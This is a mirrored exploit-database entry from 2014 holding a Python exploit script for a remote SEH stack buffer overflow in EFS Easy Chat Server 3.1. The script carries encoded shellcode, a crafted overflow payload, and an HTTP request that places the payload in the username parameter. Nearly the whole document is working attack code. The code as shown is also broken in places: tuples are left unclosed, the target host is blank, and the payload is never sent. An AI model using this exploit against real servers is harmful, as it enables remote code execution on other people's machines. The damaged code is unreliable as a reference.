EFS Easy Chat Server 3.1 – Remote Stack Buffer Overflow

  • 作者: superkojiman
    日期: 2014-05-12
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/33326/
  • ## Exploit-DB Note: The offset to SEH is influenced by the installation path of the program.
    ## For this specific exploit to work, easy chat must be installed to:
    ## 'C:\Program Files\EFS Software\Easy Chat Server'
    # Exploit Title: Easy Chat Server 3.1 stack buffer overflow
    # Date: 9 May 2014
    # Exploit Author: superkojiman - http://www.techorganic.com
    # Vendor Homepage: http://www.echatserver.com/
    # Software Link: http://www.echatserver.com/
    # Version: 3.1
    # Tested on: Windows 7 Enterprise SP1, English
    # Description: 
    # A buffer overflow is triggered when when passing a long username.
    import socket
    import struct
    # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
    # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin 
    # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
    shellcode = ( 
    "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
    "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
    "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
    "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
    "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
    "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
    "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
    # SEH overwritten at offset 207 when Easy Chat Server is
    # installed in C:\Program Files\EFS Software\Easy Chat Server
    payload ="A"*203
    payload += "\xeb\x06\x90\x90" # short jmp to shellcode
    payload += "\x1e\x0e\x01\x10" # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL
    payload += "\x81\xc4\xd8\xfe\xff\xff" # add esp,-128
    payload += shellcode# calc.exe
    payload += "D"*193
    buf = (
    "GET /chat.ghp?username=" + payload + "&password=&room=1&sex=1 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Connection: Keep-Alive\r\n\r\n"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("", 80))
    print s.recv(1024)